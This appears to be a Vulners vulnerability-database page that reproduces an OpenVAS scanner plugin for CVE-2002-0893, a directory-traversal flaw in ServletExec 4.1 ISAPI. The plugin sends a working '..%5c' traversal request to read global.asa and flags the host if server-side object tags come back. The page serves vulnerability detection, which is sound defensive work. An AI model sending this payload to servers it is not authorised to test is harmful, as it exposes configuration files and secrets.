Lucene search
K

ServletExec 4.1 ISAPI File Reading

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2002 Matt MooreType 
openvas
 openvas
🔗 plugins.openvas.org👁 33 Views

ServletExec 4.1 ISAPI File Reading. Vulnerability allows reading webroot files, global.asa, global settings

Related
Refs
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2002-0893
31 Aug 200204:00
cve
Cvelist
CVE-2002-0893
31 Aug 200204:00
cvelist
EUVD
EUVD-2002-0884
7 Oct 202500:30
euvd
NVD
CVE-2002-0893
4 Oct 200204:00
nvd
OpenVAS
ServletExec 4.1 ISAPI File Reading
3 Nov 200500:00
openvas
Tenable Nessus
ServletExec 4.1 ISAPI com.newatlanta.servletexec.JSP10Servlet Traversal Arbitrary File Access
22 May 200200:00
nessus
# SPDX-FileCopyrightText: 2002 Matt Moore
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.10959");
  script_version("2023-08-01T13:29:10+0000");
  script_tag(name:"last_modification", value:"2023-08-01 13:29:10 +0000 (Tue, 01 Aug 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_cve_id("CVE-2002-0893");
  script_name("ServletExec 4.1 ISAPI File Reading");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2002 Matt Moore");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_xref(name:"URL", value:"ftp://ftp.newatlanta.com/public/4_1/patches/");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/4795");
  script_xref(name:"URL", value:"http://www.westpoint.ltd.uk/advisories/wp-02-0006.txt");

  script_tag(name:"solution", value:"Download Patch #9 from the linked vendor FTP.");

  script_tag(name:"summary", value:"By invoking the JSPServlet directly it is possible to read the contents of
  files within the webroot that would not normally be accessible (global.asa, for example.)");

  script_tag(name:"insight", value:"When attempting to retrieve ASP pages it is common to see many
  errors due to their similarity to JSP pages in syntax, and hence only fragments of these pages
  are returned. Text files can generally be read without problem.");

  script_tag(name:"qod_type", value:"remote_vul");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");

port = http_get_port(default:80);

# Uses global.asa as target to retrieve. Could be improved to use output of webmirror.nasl
url = "/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa";
req = http_get(item:url, port:port);
res = http_keepalive_send_recv(port:port, data:req);
if(!res)
  exit(0);

if("OBJECT RUNAT=Server" >< res) {
  report = http_report_vuln_url(port:port, url:url);
  security_message(port:port, data:report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation